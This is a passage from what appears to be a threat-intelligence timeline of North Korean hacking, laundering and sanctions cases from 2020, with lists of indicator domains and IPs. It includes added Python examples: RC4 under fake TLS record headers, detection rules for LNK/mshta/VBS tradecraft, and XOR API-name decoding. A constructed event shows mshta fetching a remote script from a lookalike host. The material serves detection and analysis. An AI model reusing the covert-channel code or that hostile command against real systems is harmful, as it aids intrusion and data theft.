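The TAINTEDSCRIBE and PEBBLEDASH descriptions above rest on two ideas: TLS record headers wrapped around a payload that is not TLS at all (FakeTLS), and a stream cipher (RC4 in PEBBLEDASH's case) protecting the bytes under those headers. The Python below is an added example written for this page, not CISA's code and not the implants' code: it implements RC4 from scratch, wraps ciphertext in application_data record headers, unwraps and decrypts a captured stream, and shows what goes wrong when a fixed key is re-used for every record. The key, the commands, and the assumption that the cipher is re-keyed per record are constructed for the example; how the real implants derive and schedule keys is not described on this page.

```python
from typing import List, Tuple

TLS_APPLICATION_DATA = 0x17
TLS12 = 0x0303


def rc4_keystream(key: bytes):
    """RC4 keystream generator: key-scheduling (KSA) followed by the PRGA."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is a stream cipher, so the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def wrap_record(payload: bytes, ctype: int = TLS_APPLICATION_DATA, version: int = TLS12) -> bytes:
    """Put a 5-byte TLS record header (type, version, length) in front of a payload."""
    return bytes([ctype]) + version.to_bytes(2, "big") + len(payload).to_bytes(2, "big") + payload


def split_records(stream: bytes) -> List[Tuple[int, int, bytes]]:
    """Split a byte stream into (content_type, version, body) TLS records."""
    records, off = [], 0
    while off < len(stream):
        if len(stream) - off < 5:
            raise ValueError("truncated record header")
        ctype = stream[off]
        version = int.from_bytes(stream[off + 1:off + 3], "big")
        length = int.from_bytes(stream[off + 3:off + 5], "big")
        body = stream[off + 5:off + 5 + length]
        if len(body) != length:
            raise ValueError("truncated record body")
        records.append((ctype, version, body))
        off += 5 + length
    return records


def unwrap_faketls(stream: bytes, key: bytes) -> List[bytes]:
    """Strip the record headers and RC4-decrypt each application_data body.
    Assumption for this example: the cipher is re-keyed for every record."""
    return [rc4(key, body) for ctype, _, body in split_records(stream)
            if ctype == TLS_APPLICATION_DATA]


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """If the same key is restarted per record, c1 XOR c2 == p1 XOR p2: the
    keystream cancels out and plaintext structure leaks without the key."""
    return bytes(a ^ b for a, b in zip(c1, c2))


# Constructed session (key and commands are made up for the example).
KEY = b"Key"
COMMANDS = [b"cmd:whoami", b"cmd:ipconfig /all"]
STREAM = b"".join(wrap_record(rc4(KEY, c)) for c in COMMANDS)

if __name__ == "__main__":
    for plaintext in unwrap_faketls(STREAM, KEY):
        print(plaintext)
```

A record-layer parser like `split_records` is also the first triage step on a suspect pcap: records whose type or version field is not valid TLS, or whose bodies never carry a real handshake, are worth pulling out before trying any key. The `keystream_reuse_leak` function is the caveat for anyone tempted to copy this design: with a static key restarted per message, an analyst holding two ciphertexts and one known command can read the other without ever recovering the key.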

US Charges 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea's nuclear weapons

Date:: 2020-05-28 URL:: https://europeansanctions.com/2020/05/us-charges-33-with-violating-n-korea-wmd-sanctions/ https://nknews.org/2020/05/doj-accuses-north-koreans-of-multi-year-2-5-billion-money-laundering-scheme/ https://edition.cnn.com/2020/05/28/politics/north-korean-bankers-charges-money-laundering/index.html https://int.nyt.com/data/documenthelper/6971-north-korea-indictment/422a99ddac0c39459226/optimized/full.pdf#page=1 Tags:: Details::

  • Bringing criminal charges against 28 North Korean and 5 Chinese nationals for conspiring to violate DPRK and proliferation sanctions. Indicators::

ClearSky: CryptoCore A Threat Actor Targeting Cryptocurrency Exchanges

Date:: 2020-06-01 URL:: https://clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf Tags:: Dangerous Password, CryptoCore Details::

  • CryptoCore, Dangerous Password, Leery Turtle
  • The group often uses Google Drive as the storage for its files, specifically the bait
  • Relatively heavy use of VBS files both as downloaders and as backdoors. What appears to be the main backdoor of the group is also a VBS file (tracked by Proofpoint Emerging Threats as CageyChameleon), rather than an executable or an in-memory payload.
  • LNK shortcuts as downloaders – we have seen the attackers hide LNK shortcuts behind icons and titles of other file types, mostly text files. Sometimes it could be a password file needed to open the main document, sometimes it could be the main document that is actually a shortcut, but LNK files are a staple for this group. These files are used to connect to the command and control (C2) server and download next-stage files.
  • .xyz TLD via NameCheap
  • The VBS created in %TEMP% acts as a downloader for another VBS. That VBS collects: Username, Host name, OS version, install date and run time, Time zone, CPU name, Execution path of the VBS in %TEMP%, Network adapter information, List of running processes. The information is sent to the C2 server every minute, and it expects additional VBS as a response.
  • Heavy use of Bitly, Google Drive, and OneDrive Indicators::
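The Leery Turtle execution chain above (LNK launching mshta.exe against a remote URL on TCP 8080, a VBS stage dropped in %TEMP%, persistence via an LNK in the Startup folder) and the CryptoCore VBS downloader described in this entry are the same tradecraft, so one detection example serves both. The Python below is an added example written for this page, not code from either report: it runs three rules over constructed Sysmon-style process-creation and file-creation events and returns the hits. The event lines are made up for the example; the hostname is taken from the indicator list above, and the field names (`type`, `image`, `parent`, `cmdline`, `target`) are this example's own, not a vendor schema.

```python
import re
from urllib.parse import urlparse

# Constructed events (not from the reports): one dict per Sysmon-style event.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://docs.gdriveshare.top:8080/Password.txt'},
    {"type": "process_create", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" C:\Users\alice\AppData\Local\Temp\2nd.vbs'},
    {"type": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xBoxOne.lnk"},
    # Benign noise: mshta running a local .hta, and a shortcut saved to the desktop.
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Tools\inventory.hta'},
    {"type": "file_create", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Desktop\Notes.lnk"},
]

URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
STARTUP_LNK_RE = re.compile(r'\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$', re.IGNORECASE)
TEMP_VBS_RE = re.compile(r'\\(?:AppData\\Local\\Temp|Windows\\Temp)\\[^\s"]+\.vbs', re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, for case-insensitive image matching."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    """Return (rule, detail) hits for one event; an empty list means no rule fired."""
    hits = []
    if ev["type"] == "process_create":
        image = basename(ev["image"])
        if image == "mshta.exe":
            m = URL_RE.search(ev["cmdline"])
            if m:  # Rule 1: mshta fetching a script from a remote URL
                u = urlparse(m.group(0))
                hits.append(("mshta_remote_script", f"{u.hostname}:{u.port or 80}"))
                # Tighter variant: the 8080 listener, launched from explorer (LNK double-click).
                if u.port == 8080 and basename(ev["parent"]) == "explorer.exe":
                    hits.append(("mshta_8080_from_explorer", u.hostname))
        elif image in ("wscript.exe", "cscript.exe"):
            m = TEMP_VBS_RE.search(ev["cmdline"])
            if m:  # Rule 2: script host running a .vbs dropped in a temp directory
                hits.append(("vbs_from_temp", m.group(0)))
    elif ev["type"] == "file_create" and STARTUP_LNK_RE.search(ev["target"]):
        # Rule 3: any .lnk written to a Startup folder (the xBoxOne.lnk persistence step)
        hits.append(("startup_lnk_persistence", basename(ev["target"])))
    return hits


def scan(events: list) -> list:
    """Apply check_event to every event, preserving order."""
    return [hit for ev in events for hit in check_event(ev)]


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Rule 1 on its own is noisy in environments that legitimately use mshta.exe, which is why the example keeps the 8080-from-explorer variant separate; rule 3 is the cheap one to alert on, since a shortcut written into a Startup folder by a script host rather than by an installer is rarely benign. The `basename` helper matters more than it looks: attackers routinely copy mshta.exe or wscript.exe to another path, so match on the image name, not the full path.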

U.S. Government Advisory: Guidance on the North Korean Cyber Threat

Date:: 2020-06-23 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa20-106a Tags:: Details::

  • Many DPRK cyber actors are subordinate to UN- and U.S.-designated entities, such as the Reconnaissance General Bureau. DPRK state-sponsored cyber actors primarily consist of hackers, cryptologists, and software developers who conduct espionage, cyber-enabled theft targeting financial institutions and digital currency exchanges, and politically-motivated operations against foreign media companies. They develop and deploy a wide range of malware tools around the world to enable these activities and have grown increasingly sophisticated. Common tactics to raise revenue illicitly by DPRK state-sponsored cyber actors include, but are not limited to: Cyber-Enabled Financial Theft and Money Laundering, Extortion Campaigns, Cryptojacking Indicators::

VHD ransomware, Hakuna MATA

Date:: 2020-07-01 URL:: https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ Tags:: Details::

  • initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server. Indicators::

ATP 7-100.2. North Korean Tactics

Date:: 2020-07-01 URL:: https://irp.fas.org/doddir/army/atp7-100-2.pdf Tags:: Details::

  • Army Training Publication (ATP) 7-100.2 describes North Korean tactics for use in Army training, professional education, and leader development. This document is part of the ATP 7-100 series that addresses a nation-state's military doctrine with a focus on army ground forces and tactical operations in offense, defense, and related mission sets. Other foundational topics include task organization, capabilities, and limitations related to military mission and support functions. ATP 7-100.2 serves as a foundation for understanding how North Korean ground forces think and act in tactical operations. This publication presents multiple examples of functional tactics in dynamic operational environment conditions. The tactics in this ATP are descriptive, and provide an orientation to tactics gathered from North Korean doctrine, translated literature, and observations from recent historical events. Indicators::

North Korea Military Power: A Growing Regional and Global Threat

Date:: 2020-07-01 URL:: https://www.dia.mil/Portals/110/Documents/News/North_Korea_Military_Power.pdf Tags:: Details::

  • From North Korean Leader Kim Jong Un's Remarks at the 8th Workers’ Party Congress, Released 9 January 2021 “Building the national nuclear force was a strategic and predominant goal. The status of our state as a nuclear weapons state…enabled it to bolster its powerful and reliable strategic deterrent for coping with any threat by providing a perfect nuclear shield. New, cutting edge weapons systems were [also] developed one after another … making our state’s superiority in military technology irreversible and putting its war deterrent and capability of fighting war on the highest level.”
  • North Korea is one of the most militarized countries in the world and remains a critical security challenge for the United States, our Northeast Asian allies, and the international community. The Kim regime has seen itself as free to take destabilizing actions to advance its political goals, including attacks on South Korea, development of nuclear weapons and ballistic missiles, proliferation of weapons, and cyberattacks against civilian infrastructure worldwide. Compounding this challenge, the closed nature of the regime makes gathering facts about North Korea's military extremely difficult. Just over twenty years ago, North Korea appeared to be on the brink of national collapse. Economic assistance from former patrons in the Soviet Union disappeared; society was confronted with the death in 1994 of regime founder Kim Il Sung—revered as a deity by his people—and a 3-year famine killed almost a million people. Many experts in academia and the Intelligence Community predicted that North Korea would never see the 21st century. Yet today, North Korea not only endures under a third-generation Kim family leader, it has become a growing menace to the United States and our allies in the region. Kim Jong Un has pressed his nation down the path to develop nuclear weapons and combine them with ballistic missiles that can reach South Korea, Japan, and the United States. He has implemented a rapid, ambitious missile development and flight-testing program to refine these capabilities and improve their reliability. His vision of a North Korea that can directly hold the United States at risk, and thereby deter Washington and compel it into policy decisions beneficial to Pyongyang, is clear and is plainly articulated as a goal in authoritative North Korean rhetoric. Equally dangerous, North Korea continues to maintain one of the world's largest conventional militaries that directly threatens South Korea. The North can launch a high-intensity, short-duration attack on the South with thousands of artillery and rocket systems. This option could cause thousands of casualties and massive disruption to a regional economic hub. Kim Jong Un's emphasis on improving military training and investment in new weapon systems highlights the overriding priority the regime puts on its military capabilities. In 2018, at the historic first summit between Kim Jong Un and the President of the United States, North Korea pledged to work with the United States to accomplish what it described as "the denuclearization of the Korean Peninsula", and committed to other measures to reduce tensions and achieve "a lasting and stable peace regime." In the following years, North Korea tested multiple new missiles that threaten South Korea and U.S. forces stationed there, displayed a new, potentially more capable ICBM and new weapons for its conventional force. Additionally, there continues to be activity at North Korea's nuclear sites. These actions indicate that North Korea will continue to be a challenge for the United States in the coming years. This report is a baseline examination of North Korea and its core military capabilities, and is intended to help us better understand the current threat Pyongyang poses to the United States and its allies. Indicators::

North Korean hackers are skimming US and European shoppers

Date:: 2020-07-06 URL:: https://sansec.io/research/north-korea-magecart Tags:: Details:: Indicators::

U.S. seeks forfeiture of $2,372,793 for violations of sanctions against the DPRK

Date:: 2020-07-23 URL:: https://justice.gov/opa/pr/united-states-files-complaint-forfeit-more-237-million-companies-accused-laundering-funds Tags:: Details::

  • According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks illegally access the U.S. financial market.
  • The complaint lists one source of the laundered funds as a DPRK entity involved in the banned sale of North Korean coal. The laundered funds were used to purchase Russian petroleum products and nuclear and missile components for the DPRK and to aid multiple covert branches of the DPRK's Foreign Trade Bank, which the U.S. Treasury Department had sanctioned for facilitating transactions on behalf of actors linked to the DPRK's proliferation network. Indicators::

Operation DreamJob: Espionage Campaign Targeting Government and Defense Companies

Date:: 2020-08-13 URL:: https://clearskysec.com/operation-dream-job/ https://clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf Tags:: Operation DreamJob Details::

  • Widespread North Korean Espionage Campaign
  • It succeeded in infecting several dozens of companies and organizations in Israel and globally
  • Main targets: defense, governmental companies, and specific employees of those companies
  • We assess this to be this year’s main offensive campaign by the Lazarus group
  • The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
  • Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
  • The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country. Indicators::

DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign

Date:: 2020-08-25 URL:: https://f-secure.com/en/press/p/dprk-aligned-threat-actor-targeting-cryptocurrency-vertical-with https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical https://otx.alienvault.com/pulse/5f453929b07a627ecdfd9af9 Tags:: Dangerous Password, CryptoCore Details:: Indicators::

  • 1driv[.]org
  • al6z[.]org
  • antlercap[.]com
  • blockchaincap[.]org
  • bourncap[.]com
  • cloudfiles[.]club
  • dnsupdate[.]best
  • docsend[.]email
  • drivegoogles[.]com
  • enginecapital[.]cc
  • googledrive[.]download
  • googledrive[.]email
  • googledrive[.]online
  • googleexplore[.]net
  • idgcapital[.]org
  • msupdatepms[.]xyz
  • onedrivems[.]online
  • sequoiacapitals[.]com
  • sequoiacaps[.]com
  • swisscryptotokens[.]email
  • twosigma[.]best
  • twosigmateam[.]cc
  • twosigmateam[.]info

CISA: Report FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks

Date:: 2020-08-26 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa20-239a Tags:: Details::

  • MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
  • MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
  • MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
  • CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as FASTCash. Indicators::

US DOJ: Forfeiture Complaint for 280 Crypto addresses tied to North Korea

Date:: 2020-08-28 URL:: https://blog.chainalysis.com/reports/lazarus-group-north-korea-doj-complaint-august-2020/ https://justice.gov/usao-dc/pr/united-states-files-complaint-forfeit-280-cryptocurrency-accounts-tied-hacks-two Tags:: Details::

  • These actors stole millions of dollars’ worth of cryptocurrency and ultimately laundered the funds through Chinese over-the-counter (OTC) cryptocurrency traders. Indicators::

Yang Ban Corporation Pleads Guilty to Money Laundering

Date:: 2020-08-31 URL:: https://justice.gov/opa/pr/company-pleads-guilty-money-laundering-violation-part-scheme-circumvent-north-korean https://nknews.org/2020/09/company-pleads-guilty-to-helping-north-korea-illegally-use-us-banking-system Tags:: Details::

  • From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
  • It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent banks’ sanction and anti-money laundering filters thus duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.
  • Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, to conceal the North Korean nexus by falsifying shipping records and by other means.
  • The company will pay a financial penalty totaling $673,714 (USD) and has agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee. Indicators::

Pharma Company Espionage Attacks

Date:: 2020-09-01 URL:: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/lazarus-recruitment Tags:: Details::

  • An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
  • After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
  • In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
  • At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
  • The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
  • In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email. Indicators::

Chainalysis: report regarding Lazarus Group on-chain activity and the recent US DOJ civil forfeiture of 280 cryptocurrency addresses

Date:: 2020-09-02 URL:: https://blog.chainalysis.com/reports/lazarus-group-north-korea-doj-complaint-august-2020 Tags:: Money Laundering Details:: Indicators::

Report on Lazarus Group's targeting of crypto companies

Date:: 2020-09-02 URL:: https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf Tags:: Dangerous Password, CryptoCore Details::

  • It includes malware indicators (initial-access domains and IPs), techniques, and tactics Indicators::
  • 103.5.124[.]94
  • 103.95.99[.]3
  • 114.113.63[.]130
  • 1driv[.]org
  • 66.181.166[.]15
  • 75.146.197[.]161
  • 95.0.200[.]212
  • al6z[.]org
  • antlercap[.]com
  • azcloud.jetos[.]com
  • blockchaincap[.]org
  • bourncap[.]com
  • check[.]onedrvdn[.]co
  • chromeupdate[.]publicvm[.]com
  • client[.]cloudocs[.]space
  • client[.]googleapis[.]online
  • cloud[.]blockchaintransparency[.]institute
  • cloud[.]bugscrowd[.]com
  • cloudfiles[.]club
  • cloudssl[.]dns-cloud[.]net
  • code[.]publicvm[.]com
  • cryptofund[.]servehttp[.]com
  • cryptostore[.]publicvm[.]com
  • dnsupdate[.]best
  • doc[.]uploadsfiles[.]xyz
  • docs[.]gmaildrives[.]top
  • docs[.]googledrives[.]info
  • docs[.]sendspace[.]buzz
  • docsend[.]email
  • down[.]onedrivrshares[.]xyz
  • down_01fcd_fff[.]googldocs[.]org
  • download[.]gdriveupload[.]site
  • download[.]showprice[.]xyz
  • downloadsvc[.]publicvm[.]com
  • downurl[.]icu
  • drive[.]gogleshare[.]xyz
  • drive[.]publicvm[.]com
  • drivegoogle[.]publicvm[.]com
  • drivegoogles[.]com
  • drivegooglshare[.]xyz
  • drives[.]googldrive[.]xyz
  • drives[.]googlecloud[.]live
  • drverify[.]dns-cloud[.]net
  • enginecapital[.]cc
  • eu[.]euprotect[.]net
  • europasec[.]dnsabr[.]com
  • ff[.]upfilees[.]xyz
  • file[.]onedrivecloud[.]store
  • gbackup[.]gogleshare[.]xyz
  • gdocs[.]googleupload[.]info
  • gdrvshare[.]onedrvshare[.]host
  • gethelp[.]best
  • googledrive[.]download
  • googledrive[.]email
  • googledrive[.]network
  • googledrive[.]online
  • googledrive[.]publicvm[.]com
  • googleexplore[.]net
  • googleupdate[.]publicvm[.]com
  • icloud-mail[.]net
  • idgcapital[.]org
  • IPblog[.]cloudsecure[.]space
  • luisgarcia[.]myftp[.]org
  • mail[.]gdriveupload[.]info
  • mail[.]gmaildrive[.]site
  • mail[.]googleupload[.]info
  • map[.]navicheck[.]xyz
  • matrix-partners[.]theworkpc[.]com
  • microsoft-update10v[.]amazonaws1[.]info
  • mse[.]theworkpc[.]com
  • mskpupdate[.]publicvm[.]com
  • msupdatepms[.]xyz
  • name[.]ownemail[.]me
  • office[.]onedriveglobal[.]com
  • onedrive[.]onedriveglobal[.]com
  • onedrivems[.]online
  • onedriveupdate[.]publicvm[.]com
  • open[.]gdriveshareslink[.]xyz
  • p2p[.]downefile[.]xyz
  • pp[.]fcloudshare[.]xyz
  • reghelp[.]webredirect[.]org
  • robugnito[.]publicvm[.]com
  • scloud[.]wechart[.]org
  • sendgrid[.]webredirect[.]org
  • sequoiacapitals[.]com
  • sequoiacaps[.]com
  • sfile[.]onedrivecloud[.]store
  • share[.]goglesheet[.]com
  • share[.]googlefiledrive[.]com
  • share[.]onedriveglobal[.]com
  • share[.]onedrvfile[.]site
  • sshare[.]onedriveglobal[.]com
  • st[.]decurret[.]site
  • store[.]onedriveglobal[.]com
  • support[.]gdrvcheck[.]co
  • swisscryptotokens[.]email
  • toyota-ai[.]org
  • twosigma[.]best
  • twosigma[.]linkpc[.]net
  • twosigma[.]publicvm[.]com
  • twosigma[.]theworkpc[.]com
  • twosigmateam[.]cc
  • twosigmateam[.]info
  • waterm.publicvm[.]com

Secret documents show how North Korea launders money through U.S. banks

Date:: 2020-09-20 URL:: https://nbcnews.com/news/world/secret-documents-show-how-north-korea-launders-money-through-u-n1240329 Tags:: Details:: Indicators::

US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020

Date:: 2020-09-20 URL:: https://justice.gov/usao-cdca/press-release/file/1367721/dl?inline= Tags:: Applejeus Details::

  • Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale. Indicators::

NTT Security: Unveiling The Cryptomimic

Date:: 2020-10-02 URL:: https://vblocalhost.com/uploads/VB2020-Takai-etal.pdf Tags:: DangerousPassword, CryptoMimic Details::

  • CryptoMimic, the APT attack group we are chasing, is an actor also known as Dangerous Password, CageyChameleon and Leery Turtle.
  • Cabbage RAT
  • Interestingly, there were no attacks on Sundays.
  • CryptoMimic seems to go to great lengths to avoid providing the malicious file to third parties other than original target.
  • The download URL for the Zip file sent to the target becomes invalid promptly. Files including the Zip file are supplied by leveraging a redirect from the website the group prepared to a cloud service such as OneDrive, but redirecting is available for only two or three days.
  • The downloaded Zip file includes a document file, such as .doc or .pdf, and a LNK file. In many cases, the name of the LNK file is something like ‘Password.txt.lnk’. Because the document file is password protected (Figure 3), the user is fooled into opening the LNK file to check the password, which initiates the attack.
  • As the attack goes on, CryptoMimic sends a RAT called Cabbage RAT, written in VBScript in stages. In its early stage, it checks the target’s environment. To be more specific, Cabbage RAT-B collects and sends the system and task information of its working environment to the C&C server. If CryptoMimic doesn’t judge it as an attractive target, the attack won’t go any further. Indicators::

CISA: Report on North Korean Advanced Persistent Threat Focus: Kimsuky

Date:: 2020-10-27 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa20-301a Tags:: Kimsuky Details::

  • CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky. Indicators::

NukeSped Lazarus supply-chain attack in South Korea

Date:: 2020-11-16 URL:: https://welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/ Tags:: Details::

  • WIZVERA VeraPort, referred to as an integration installation program, is a South Korean application that helps manage such additional security software.
  • The initial dropper is a console application that requires parameters, executes the next stages in a cascade and uses encryption, cf. the watering hole attacks against Polish and Mexican banks
  • The final payload is a RAT module, with TCP communications and its commands indexed by 32-bit integers, cf. KillDisk in Central America
  • Many tools delivered via this chain are already flagged as NukeSped by ESET software. For example, the signed Downloader in the Analysis section is based on a project called WinHttpClient and it leads to a similar tool with hash 1EA7481878F0D9053CCD81B4589CECAEFC306CF2, which we link with a sample from Operation Blockbuster (CB818BE1FCE5393A83FBFCB3B6F4AC5A3B5B8A4B). The connection between the latter two is the dynamic resolution of Windows APIs where the names are XOR-encrypted by 0x23, e.g., dFWwLHFMjMELQNBWJLM is the encoding of GetTokenInformation. Indicators::
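The XOR-0x23 API-name encoding above is a cheap obfuscation: the key space is one byte, and the plaintext is drawn from a known, finite set (Windows export names), so an analyst can both decode a given string and recover the key from a blob without knowing it. The Python below is an added example written for this page, not ESET's tooling: it decodes the string quoted above, brute-forces the key against a small API-name dictionary, falls back to an identifier-shape heuristic when the dictionary misses, and runs a `strings`-style scan over a constructed binary blob. The dictionary is deliberately tiny and the blob is made up; the only real data in it is the encoded `GetTokenInformation` string from the ESET write-up.

```python
import string
from typing import Iterator, List, Optional, Tuple

# Small dictionary of Windows API names to match against. A real tool would load
# the export tables of kernel32/advapi32/etc.; these few suffice for the example.
KNOWN_APIS = {
    "GetTokenInformation", "OpenProcessToken", "CreateFileW", "WriteFile",
    "VirtualAlloc", "LoadLibraryA", "GetProcAddress", "WinHttpOpen",
}


def xor_str(s: str, key: int) -> str:
    """XOR every character with a one-byte key; the transform is its own inverse."""
    return "".join(chr(ord(c) ^ key) for c in s)


def decode_api(encoded: str, key: int = 0x23) -> str:
    """Recover an API name from its XOR-0x23 encoding, as in the NukeSped sample."""
    return xor_str(encoded, key)


def recover_key(encoded: str, dictionary=KNOWN_APIS) -> Optional[Tuple[int, str]]:
    """Brute-force the one-byte key: 256 candidates, and the right one yields a known name."""
    for key in range(256):
        candidate = xor_str(encoded, key)
        if candidate in dictionary:
            return key, candidate
    return None


def recover_key_by_shape(encoded: str) -> List[Tuple[int, str]]:
    """Dictionary-free fallback: keep keys whose output looks like a CamelCase identifier."""
    alnum = set(string.ascii_letters + string.digits)
    return [(key, cand) for key in range(256)
            for cand in [xor_str(encoded, key)]
            if cand[0].isupper() and set(cand) <= alnum]


def printable_runs(blob: bytes, min_len: int = 6) -> Iterator[str]:
    """Yield runs of printable ASCII of at least min_len bytes, like the `strings` tool."""
    run = bytearray()
    for b in blob:
        if 0x20 <= b < 0x7F:
            run.append(b)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run = bytearray()
    if len(run) >= min_len:
        yield run.decode("ascii")


def find_encoded_apis(blob: bytes, key: int = 0x23, dictionary=KNOWN_APIS) -> List[str]:
    """Scan a binary for printable runs that decode (under `key`) to known API names."""
    return [xor_str(r, key) for r in printable_runs(blob) if xor_str(r, key) in dictionary]


# Constructed test binary (not a real sample): the encoded string from the ESET
# write-up, a second API name encoded the same way, and an unrelated plain string.
SAMPLE_BLOB = (b"MZ\x90\x00" + b"dFWwLHFMjMELQNBWJLM" + b"\x00\x00"
               + xor_str("OpenProcessToken", 0x23).encode("ascii") + b"\x00"
               + b"Hello, World!\x00")

if __name__ == "__main__":
    print(decode_api("dFWwLHFMjMELQNBWJLM"))   # GetTokenInformation
    print(recover_key("dFWwLHFMjMELQNBWJLM"))  # (35, 'GetTokenInformation')
    print(find_encoded_apis(SAMPLE_BLOB))      # ['GetTokenInformation', 'OpenProcessToken']
```

Because XOR with a single byte maps letters to other printable bytes, the encoded names still show up as ordinary `strings` output, which is why `find_encoded_apis` is a practical first pass over an unpacked sample: run it with each key returned by `recover_key` on one known string, and the rest of the import table falls out. The same brute force generalizes to any one-byte scheme (ADD, ROL) by swapping `xor_str`.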

Exposing the Financial Footprints of North Korea’s Hackers

Date:: 2020-11-18 URL:: https://cnas.org/publications/reports/exposing-the-financial-footprints-of-north-koreas-hackers Tags:: Details::

  • North Korea conducts intricate and sweeping cyberattacks against the United States and its allies to acquire funds to support its illicit nuclear proliferation efforts. Unlike more economically advanced nuclear states possessing domestic research, development, and deployment capacities to establish weapon of mass destruction (WMD) programs, the Democratic People’s Republic of Korea (DPRK) must seek financial resources, assistance, and institutional knowledge, at least initially, from overseas. It has developed its cyber capabilities in order to circumvent financial sanctions and global safeguards, conducting elaborate online bank heists and hacking attacks; stealing funds through fraudulent bank transfers, Society for Worldwide Interbank Financial Telecommunications (SWIFT) transactions, and ATM cash-outs; launching ransomware attacks demanding payment in cryptocurrency; and hacking cryptocurrency exchanges. The scale and sophistication of these innovative sanctions evasion tactics create a challenge that calls for stronger measures to confront them. In addition to providing policy recommendations for U.S. leadership and financial institutions, this report will outline the ways North Korea supports, expands, and utilizes cyber operations to acquire funds for its nuclear weapons program. Indicators::

North Korean hackers targeted COVID vaccine maker AstraZeneca

Date:: 2020-11-27 URL:: https://reuters.com/article/uk-healthcare-coronavirus-astrazeneca-no/exclusive-suspected-north-korean-hackers-targeted-covid-vaccine-maker-astrazeneca-sources-idUKKBN28719Y Tags:: Details:: Indicators::

OFAC Cyber-related Designations

Date:: 2020-12-08 URL:: https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20201208 Tags:: Details:: Indicators::

Greetings from Lazarus: Pharma Company Espionage Attacks

